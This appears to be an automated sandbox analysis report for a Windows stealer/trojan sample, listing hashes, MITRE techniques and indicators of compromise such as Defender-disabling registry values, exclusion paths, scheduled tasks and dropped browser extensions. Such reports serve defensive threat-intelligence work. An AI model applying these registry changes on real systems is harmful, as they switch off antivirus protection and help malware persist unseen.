dce6cdd2c122b887725c2a60ec7761a93c1ead60ba78d49aff5677161fad4c63

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

1d403a08252cb0cea368c5a2383efbf1
SHA1

ace16e30c1f12c22ec655caf04b62abda3f2049e
SHA256

dce6cdd2c122b887725c2a60ec7761a93c1ead60ba78d49aff5677161fad4c63
SHA512

0c7706a396914174524301a0821aed281ad1b742ea1e3a9c2757558188d6732b09f3f8e510807f5ec369639118f0f2a85f6c5650067bb78c5cc488d6d5ce4eab
SSDEEP

196608:91OUh4w9xODsuDG6jl1ac/jkkeFXgQV/BQekON18vntX:3OcxO9DHF0X5QexantX

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gcyASImYjZBU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vCYWhmhlU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\QtEKgGNERTHTknVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gUXCkMfuWzCyC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yqOJJFIvHNUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LzrOtnkAyuDpOCzW = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

21 888 rundll32.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeUoINOUE.exeAvvXMtd.exe

pid process

1692 Install.exe
836 Install.exe
952 UoINOUE.exe
268 AvvXMtd.exe

flow	pid	process
21	888	rundll32.exe

pid	process
1692	Install.exe
836	Install.exe
952	UoINOUE.exe
268	AvvXMtd.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

AvvXMtd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation AvvXMtd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation	AvvXMtd.exe

Loads dropped DLL 12 IoCs

Processes:

file.exeInstall.exeInstall.exerundll32.exe

pid	process
1768	file.exe
1692	Install.exe
1692	Install.exe
1692	Install.exe
1692	Install.exe
836	Install.exe
836	Install.exe
836	Install.exe
888	rundll32.exe
888	rundll32.exe
888	rundll32.exe
888	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

AvvXMtd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	AvvXMtd.exe

Drops file in System32 directory 19 IoCs

Processes:

AvvXMtd.exepowershell.EXEUoINOUE.exepowershell.EXErundll32.exepowershell.EXEInstall.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	AvvXMtd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70	AvvXMtd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	UoINOUE.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	UoINOUE.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3	AvvXMtd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AvvXMtd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AvvXMtd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70	AvvXMtd.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AvvXMtd.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	AvvXMtd.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	UoINOUE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AvvXMtd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3	AvvXMtd.exe

Drops file in Program Files directory 13 IoCs

Processes:

AvvXMtd.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	AvvXMtd.exe
File created	C:\Program Files (x86)\vCYWhmhlU\RSyOvKC.xml	AvvXMtd.exe
File created	C:\Program Files (x86)\gcyASImYjZBU2\ddGkGad.xml	AvvXMtd.exe
File created	C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\nSgWAXD.xml	AvvXMtd.exe
File created	C:\Program Files (x86)\gUXCkMfuWzCyC\zWGkvtp.dll	AvvXMtd.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	AvvXMtd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	AvvXMtd.exe
File created	C:\Program Files (x86)\gcyASImYjZBU2\BZAKxzAYbEXQw.dll	AvvXMtd.exe
File created	C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\jXYabvR.dll	AvvXMtd.exe
File created	C:\Program Files (x86)\gUXCkMfuWzCyC\gQCPPMX.xml	AvvXMtd.exe
File created	C:\Program Files (x86)\yqOJJFIvHNUn\nltaxnE.dll	AvvXMtd.exe
File created	C:\Program Files (x86)\vCYWhmhlU\ZKzYEQ.dll	AvvXMtd.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	AvvXMtd.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\AFcndnMIJqNXhoPDJ.job	schtasks.exe
File created	C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job	schtasks.exe
File created	C:\Windows\Tasks\ehnYTuGzyhWqfGFsn.job	schtasks.exe
File created	C:\Windows\Tasks\ulJHerdNyNJKzGw.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2008	schtasks.exe
1916	schtasks.exe
1824	schtasks.exe
2036	schtasks.exe
1524	schtasks.exe
1740	schtasks.exe
2004	schtasks.exe
1196	schtasks.exe
1344	schtasks.exe
1276	schtasks.exe
268	schtasks.exe
516	schtasks.exe
1932	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

AvvXMtd.exewscript.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	AvvXMtd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	AvvXMtd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A72DDFF-71A7-4DEB-BDE0-27C03B1454B5}\WpadDecisionTime = 304fcb6241ffd801	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	AvvXMtd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	AvvXMtd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A72DDFF-71A7-4DEB-BDE0-27C03B1454B5}\WpadDecisionReason = "1"	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	AvvXMtd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	AvvXMtd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b7-cd-fe-6e-b6\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b7-cd-fe-6e-b6\WpadDecisionTime = 304fcb6241ffd801	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	AvvXMtd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	AvvXMtd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	AvvXMtd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b7-cd-fe-6e-b6	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	AvvXMtd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A72DDFF-71A7-4DEB-BDE0-27C03B1454B5}\WpadDecision = "0"	AvvXMtd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b7-cd-fe-6e-b6\WpadDecisionTime = 304fcb6241ffd801	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-b7-cd-fe-6e-b6	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	AvvXMtd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	AvvXMtd.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEAvvXMtd.exe

pid	process
1652	powershell.EXE
1652	powershell.EXE
1652	powershell.EXE
1708	powershell.EXE
1708	powershell.EXE
1708	powershell.EXE
828	powershell.EXE
828	powershell.EXE
828	powershell.EXE
1228	powershell.EXE
1228	powershell.EXE
1228	powershell.EXE
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe
268	AvvXMtd.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1652	powershell.EXE
Token: SeDebugPrivilege	1708	powershell.EXE
Token: SeDebugPrivilege	828	powershell.EXE
Token: SeDebugPrivilege	1228	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1768 wrote to memory of 1692	1768	file.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 1692 wrote to memory of 836	1692	Install.exe	Install.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 548	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 836 wrote to memory of 1204	836	Install.exe	forfiles.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 548 wrote to memory of 360	548	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 964	1204	forfiles.exe	cmd.exe
